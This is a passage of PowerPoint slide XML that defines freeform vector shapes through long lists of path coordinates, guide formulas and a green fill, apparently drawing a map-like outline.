                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="124"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36193" name="Freeform 326"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="880" y="2396"/>
                <a:ext cx="480" cy="315"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 307 w 480"/>
                  <a:gd name="T1" fmla="*/ 167 h 315"/>
                  <a:gd name="T2" fmla="*/ 322 w 480"/>
                  <a:gd name="T3" fmla="*/ 218 h 315"/>
                  <a:gd name="T4" fmla="*/ 343 w 480"/>
                  <a:gd name="T5" fmla="*/ 245 h 315"/>
                  <a:gd name="T6" fmla="*/ 371 w 480"/>
                  <a:gd name="T7" fmla="*/ 252 h 315"/>
                  <a:gd name="T8" fmla="*/ 406 w 480"/>
                  <a:gd name="T9" fmla="*/ 249 h 315"/>
                  <a:gd name="T10" fmla="*/ 417 w 480"/>
                  <a:gd name="T11" fmla="*/ 228 h 315"/>
                  <a:gd name="T12" fmla="*/ 428 w 480"/>
                  <a:gd name="T13" fmla="*/ 205 h 315"/>
                  <a:gd name="T14" fmla="*/ 461 w 480"/>
                  <a:gd name="T15" fmla="*/ 198 h 315"/>
                  <a:gd name="T16" fmla="*/ 480 w 480"/>
                  <a:gd name="T17" fmla="*/ 208 h 315"/>
                  <a:gd name="T18" fmla="*/ 466 w 480"/>
                  <a:gd name="T19" fmla="*/ 229 h 315"/>
                  <a:gd name="T20" fmla="*/ 465 w 480"/>
                  <a:gd name="T21" fmla="*/ 250 h 315"/>
                  <a:gd name="T22" fmla="*/ 458 w 480"/>
                  <a:gd name="T23" fmla="*/ 249 h 315"/>
                  <a:gd name="T24" fmla="*/ 444 w 480"/>
                  <a:gd name="T25" fmla="*/ 261 h 315"/>
                  <a:gd name="T26" fmla="*/ 414 w 480"/>
                  <a:gd name="T27" fmla="*/ 276 h 315"/>
                  <a:gd name="T28" fmla="*/ 403 w 480"/>
                  <a:gd name="T29" fmla="*/ 289 h 315"/>
                  <a:gd name="T30" fmla="*/ 392 w 480"/>
                  <a:gd name="T31" fmla="*/ 311 h 315"/>
                  <a:gd name="T32" fmla="*/ 362 w 480"/>
                  <a:gd name="T33" fmla="*/ 287 h 315"/>
                  <a:gd name="T34" fmla="*/ 324 w 480"/>
                  <a:gd name="T35" fmla="*/ 294 h 315"/>
                  <a:gd name="T36" fmla="*/ 290 w 480"/>
                  <a:gd name="T37" fmla="*/ 281 h 315"/>
                  <a:gd name="T38" fmla="*/ 249 w 480"/>
                  <a:gd name="T39" fmla="*/ 265 h 315"/>
                  <a:gd name="T40" fmla="*/ 213 w 480"/>
                  <a:gd name="T41" fmla="*/ 248 h 315"/>
                  <a:gd name="T42" fmla="*/ 185 w 480"/>
                  <a:gd name="T43" fmla="*/ 222 h 315"/>
                  <a:gd name="T44" fmla="*/ 188 w 480"/>
                  <a:gd name="T45" fmla="*/ 213 h 315"/>
                  <a:gd name="T46" fmla="*/ 184 w 480"/>
                  <a:gd name="T47" fmla="*/ 189 h 315"/>
                  <a:gd name="T48" fmla="*/ 158 w 480"/>
                  <a:gd name="T49" fmla="*/ 155 h 315"/>
                  <a:gd name="T50" fmla="*/ 144 w 480"/>
                  <a:gd name="T51" fmla="*/ 137 h 315"/>
                  <a:gd name="T52" fmla="*/ 127 w 480"/>
                  <a:gd name="T53" fmla="*/ 128 h 315"/>
                  <a:gd name="T54" fmla="*/ 121 w 480"/>
                  <a:gd name="T55" fmla="*/ 108 h 315"/>
                  <a:gd name="T56" fmla="*/ 105 w 480"/>
                  <a:gd name="T57" fmla="*/ 97 h 315"/>
                  <a:gd name="T58" fmla="*/ 97 w 480"/>
                  <a:gd name="T59" fmla="*/ 85 h 315"/>
                  <a:gd name="T60" fmla="*/ 72 w 480"/>
                  <a:gd name="T61" fmla="*/ 51 h 315"/>
                  <a:gd name="T62" fmla="*/ 65 w 480"/>
                  <a:gd name="T63" fmla="*/ 28 h 315"/>
                  <a:gd name="T64" fmla="*/ 49 w 480"/>
                  <a:gd name="T65" fmla="*/ 21 h 315"/>
                  <a:gd name="T66" fmla="*/ 37 w 480"/>
                  <a:gd name="T67" fmla="*/ 31 h 315"/>
                  <a:gd name="T68" fmla="*/ 49 w 480"/>
                  <a:gd name="T69" fmla="*/ 56 h 315"/>
                  <a:gd name="T70" fmla="*/ 68 w 480"/>
                  <a:gd name="T71" fmla="*/ 79 h 315"/>
                  <a:gd name="T72" fmla="*/ 79 w 480"/>
                  <a:gd name="T73" fmla="*/ 98 h 315"/>
                  <a:gd name="T74" fmla="*/ 93 w 480"/>
                  <a:gd name="T75" fmla="*/ 123 h 315"/>
                  <a:gd name="T76" fmla="*/ 106 w 480"/>
                  <a:gd name="T77" fmla="*/ 153 h 315"/>
                  <a:gd name="T78" fmla="*/ 122 w 480"/>
                  <a:gd name="T79" fmla="*/ 163 h 315"/>
                  <a:gd name="T80" fmla="*/ 112 w 480"/>
                  <a:gd name="T81" fmla="*/ 172 h 315"/>
                  <a:gd name="T82" fmla="*/ 83 w 480"/>
                  <a:gd name="T83" fmla="*/ 144 h 315"/>
                  <a:gd name="T84" fmla="*/ 75 w 480"/>
                  <a:gd name="T85" fmla="*/ 118 h 315"/>
                  <a:gd name="T86" fmla="*/ 57 w 480"/>
                  <a:gd name="T87" fmla="*/ 107 h 315"/>
                  <a:gd name="T88" fmla="*/ 38 w 480"/>
                  <a:gd name="T89" fmla="*/ 89 h 315"/>
                  <a:gd name="T90" fmla="*/ 46 w 480"/>
                  <a:gd name="T91" fmla="*/ 73 h 315"/>
                  <a:gd name="T92" fmla="*/ 21 w 480"/>
                  <a:gd name="T93" fmla="*/ 45 h 315"/>
                  <a:gd name="T94" fmla="*/ 10 w 480"/>
                  <a:gd name="T95" fmla="*/ 26 h 315"/>
                  <a:gd name="T96" fmla="*/ 0 w 480"/>
                  <a:gd name="T97" fmla="*/ 2 h 315"/>
                  <a:gd name="T98" fmla="*/ 49 w 480"/>
                  <a:gd name="T99" fmla="*/ 7 h 315"/>
                  <a:gd name="T100" fmla="*/ 126 w 480"/>
                  <a:gd name="T101" fmla="*/ 26 h 315"/>
                  <a:gd name="T102" fmla="*/ 170 w 480"/>
                  <a:gd name="T103" fmla="*/ 19 h 315"/>
                  <a:gd name="T104" fmla="*/ 194 w 480"/>
                  <a:gd name="T105" fmla="*/ 45 h 315"/>
                  <a:gd name="T106" fmla="*/ 222 w 480"/>
                  <a:gd name="T107" fmla="*/ 67 h 315"/>
                  <a:gd name="T108" fmla="*/ 241 w 480"/>
                  <a:gd name="T109" fmla="*/ 53 h 315"/>
                  <a:gd name="T110" fmla="*/ 266 w 480"/>
                  <a:gd name="T111" fmla="*/ 80 h 315"/>
                  <a:gd name="T112" fmla="*/ 284 w 480"/>
                  <a:gd name="T113" fmla="*/ 111 h 315"/>
                  <a:gd name="T114" fmla="*/ 307 w 480"/>
                  <a:gd name="T115" fmla="*/ 120 h 315"/>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480"/>
                  <a:gd name="T175" fmla="*/ 0 h 315"/>
                  <a:gd name="T176" fmla="*/ 480 w 480"/>
                  <a:gd name="T177" fmla="*/ 315 h 315"/>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480" h="315">
                    <a:moveTo>
                      <a:pt x="316" y="124"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="313" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="338" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="412" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="417" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="469" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="475" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="470" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="444" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="444" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="293"/>
                    </a:lnTo>
